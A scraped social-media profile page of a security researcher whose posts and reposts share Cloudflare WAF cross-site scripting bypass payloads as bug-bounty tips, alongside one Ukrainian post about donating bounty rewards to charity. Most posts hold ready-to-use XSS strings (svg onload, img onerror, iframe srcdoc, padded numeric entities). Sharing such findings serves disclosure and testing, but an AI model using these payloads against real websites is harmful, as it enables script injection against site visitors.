tohasec's profile picture. Security researcher from lovely Ukraine 💙💛

Anton Korzhynskyi

@tohasec

Security researcher from lovely Ukraine 💙💛

Anton Korzhynskyi รีโพสต์แล้ว

New Cloudflare XSS Bypass: <svg/OnLoad="`${prompt``}`"> Proof: waf.cumulusfire.net/xss?globalHtml… A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase. #WAF #XSS #BugBounty #BugBountyTip


Anton Korzhynskyi รีโพสต์แล้ว

Шановні @the_prozorro та @HackenProof! Я та @page_1337 хочемо передати винагороду за найдені вразливості на #hackprozorro відразу на благодійність дітям, наприклад через blago.privatbank.ua Що для цього потрібно?


My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip

tohasec's tweet image. My turn :)

Cloudflare #XSS #Bypass 

&amp;lt;img src onerror=%26emsp;prompt`${document.domain}`&amp;gt;

#WAF #BugBounty #BugBountyTip

Anton Korzhynskyi รีโพสต์แล้ว

Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip


Anton Korzhynskyi รีโพสต์แล้ว

Another #Cloudflare #XSS #Bypass xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> #WAF #BugBounty #BugBountyTip


Anton Korzhynskyi รีโพสต์แล้ว

Cloudflare XSS Bypass via add 8 or more superfluous leading zeros for dec and 7 or more for hex. Dec: <svg onload=prompt%26%230000000040document.domain)> Hex: <svg onload=prompt%26%23x000000028;document.domain)> #Bypass #WAF #XSS #Cloudflare #BugBountyTip


Loading...

Something went wrong.


Something went wrong.